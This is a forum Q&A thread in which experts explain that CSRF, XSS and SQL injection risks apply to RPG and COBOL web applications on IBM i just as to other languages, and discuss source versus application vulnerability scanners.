Is Cross Site Request Forgery (CSRF) & XSS applicable to RPG coding?

Posted on 2016-08-13
Last Modified: 2016-08-19

I refer to above url

a) is the above url's sample codes RPG codes?

b) are CSRF & XSS secure coding applicable to RPG coding?
Question by:sunhux
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 3
  • 2
  • 2
  • +2

Author Comment

ID: 41754775
RPG is the coding used in AS400 or OS400
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41754810
The site shows the RPG typing for the mentioned CGI program which takes in the csrftoken.
D CSRFToken       S            256                          
D CSRFTokenCookie...                                        
D                 S            256                          


CSRFToken = #getData('CSRFToken');          
CSRFTokenCookie = #getCookie('CSRFToken');
You can check out the IBM site on RPG programming codes, note the syntax!/wiki/We13116a562db_467e_bcd4_882013aec57a/page/Coding%20in%20RPG%20IV%20-%20Chapter%202%20General%20info%20about%20RPG

Secure coding on web vulnerabilities as mentioned applys in the concept, it is not only web based. For e.g. general SQL secure practices also apply to DB2 on the iSeries (injection protection and such) which includes embedded SQL in RPG programs.

See secure coding for business oriented languages like COBOL and RPG which are application driven fronted mostly by web based services. Application based tend to interface with DB tier hence the below shows gaps specific to SQL injection coding

RPG language is used today in IBM platforms, on mainframe and mid-range systems (iSeries, AS/400 or whatever brand IBM currently uses). “Attack surface” is similar to COBOL, with security concerns in RPG code not well-known, as with COBOL.

Regarding technical flaws, RPG uses EXEC SQL for embedded code, that is safe unless dynamic SQL is used
LVL 62

Expert Comment

by:☠ MASQ ☠
ID: 41755053
RPG is the coding used in AS400 or OS400
That's a relief! I was trying to work out how CSRF could be used as an exploit in Role Playing Games!
How our DevOps Teams Maximize Uptime

Our Dev teams are like yours. They’re continually cranking out code for new features/bugs fixes, testing, deploying, responding to production monitoring events and more. It’s complex. So, we thought you’d like to see what’s working for us. Read the use case whitepaper.

LVL 35

Assisted Solution

by:Gary Patterson
Gary Patterson earned 250 total points
ID: 41756222
1a) Yes, CGI example shown is RPG.

1b). Yes.  RPG applications can be vulnerable to CSRF & XSS if proper precautions are not taken - same as any programming language.
LVL 33

Assisted Solution

shalomc earned 125 total points
ID: 41757928
CSRF and XSS vulnerabilities exist because of how http web servers and web clients interface and operate, regardless of the platform the server runs on. It could be php, or java, or node.js, or RPG.

Sometimes you as a programmer use a framework that attempts to mitigate those risks, but they are always there, and must be dealt with. To deal with CSRF, XSS and other application level attack like content injections, you must first understand what they do and how they can be invoked. I strongly suggest to look at the OWASP top 10.

You will notice that although some server side examples are presented in php or java, they are applicable in all programming languages and frameworks, even in RPG.

Especially in RPG, since IBM i developers who turned to web tend to be too arrogant in their false presumption that they have the best and most secure platform in the world.

Author Comment

ID: 41759852
Thanks Gary, Shalom.

I'm facing resistance from my colleagues in apps teams doing Cobol & RPG coding who categorically
claim that XSS & CSRF & X-Frame-Option (=SAMEORIGIN to deal with clickjacking) are irrelevant &
inapplicable to RPG & Cobol.

If you could indicate short Cobol & RPG codes that allude to XSS & clickjacking vulnerabilities or
provide more links that explicitly indicate so, it would help to convince them

One side question:
an external consultant for secure coding told me that opensource source code scanner (eg: Yasca)
usually detect about 20% of poor/insecure codes only while paid scanners (specifically he says
Fortify & Appscan) usually detect about 3 times more for the same piece of codes: any truth?
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41760559
You should also include SQLi, this is also one of the top major web vulnerability (also in OWASP)
- sample for COBOL and RPG (as in my last post) -

To further this, Appscan (scan tool) also advocate the flaw checks in COBOL source code. Instead you should ask the code to scan using the scanner instead of getting any other codes to reflect for assurance
How do you learn about COBOL scan rules in IBM Security AppScan Source for Security - and what are some of the potential vulnerabilities in COBOL source code?


 COBOL files (.cbl) can be directly imported into AppScan Source for security scanning.

 From a security perspective, COBOL applications have similar considerations to any other kind of application. AppScan Source can help you identify high risk locations within your COBOL application - and assist you in their remediation.
LVL 63

Assisted Solution

btan earned 125 total points
ID: 41760570
YASCA coverage is dependent more on the plugin it supports, like some of the external plugins distributed with Yasca are as below. But note the plugin will be file extension specific to invoke scan. For instance, a plugin that scans Java source code can be configured to only scan files with the .java extension.
 Grep Plugin. Uses external GREP files to scan target files for simple patterns.
 PMD Plugin. Uses PMD to parse and scan Java (and JSP) source code for issues.
 JLint Plugin. Uses J-Lint to scan Java .class files for issues.
 antiC Plugin. Uses antiC to scan Java and C/C++ source code for issues.
 FindBugs Plugin. Uses FIndBugs to scan Java class and Jar files for issues.
 Lint4J Plugin. Uses Lint4J to scan Java .class files for issues.

The grep plugin is useful in having extended coverage as long as you can supplied the valid PCRE-style regular expression for the flaw including OWASP. For more info, see this
LVL 33

Assisted Solution

shalomc earned 125 total points
ID: 41760910
Hi sunhux,

Obviously your colleagues are clueless to the nature of CSRF and XSS.
Please read the OWASP examples and show them that XSS and CSRF are platform agnostic, and are as applicable to COBOL web apps as to PHP code.

You can also tell them that the author of this book told you personally that using COBOL does not make a web application immune to these attacks.  

COBOL and RPG, although poor choices for web development, are capable to deal with web based attacks ONLY IF you make them so, not by any inherent nature.

The only way for COBOL and RPG to be irrelevant is if all of the web interface is managed by an external platform, and COBOl/RPG are used as a data backend to that. But then SQL injection must still be ruled out.
LVL 35

Accepted Solution

Gary Patterson earned 250 total points
ID: 41761558
Who knows, maybe your colleagues are using a framework that includes good input validation, or have built and maintain good input validation routines that make their sites invulnerable to these attacks.I'd need to see your production code to comment.  

Maybe all the UI layer is managed by another software layer, and all the RPG programs see are nice validated input.

Maybe they are living in AS/400 security dreamland:  a place where nothing bad can ever happen to you because you because you run a magical operating system that even protects them against programmer errors and ignorance.

But there is nothing in RPG (I'm an IBM i / iSeries AS400 RPG programmer with almost 3 decades of experience) that provides automatic protection from these attacks.  It has nothing to do with the inherent security of the operating system - this is all about understanding web application security, and how to prevent common attacks through input validation.

For RPG, good luck with source vulnerability scanners.  They need to understand the programming language, and most don't - not even IBM's AppScan Source product (which really is a great product- I've used it in the past):

There are two approaches to web application security (we prefer using both for web-facing mission critical applications):

Application scanning applications - which typically simulate an attack to determine if a vulnerability exists.

Source scanning applications - which search application search code for high-code patterns (or missing validation code patterns).

For applications that depend on less-widely used web programming languages like RPG, I suggest you look at application scanning tools, as opposed to source scanning tools.

Featured Post

Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
SCSM reports export 1 54
Getting Variable not defined error in Python 1 45
Java array 10 65
iSeries RPGLE %substr length error 2 31
In this post we will learn different types of Android Layout and some basics of an Android App.
This article describes my battle tested process for setting up delegation. I use this process anywhere that I need to setup delegation. In the article I will show how it applies to Active Directory
This is used to tweak the memory usage for your computer, it is used for servers more so than workstations but just be careful editing registry settings as it may cause irreversible results. I hold no responsibility for anything you do to the regist…

730 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question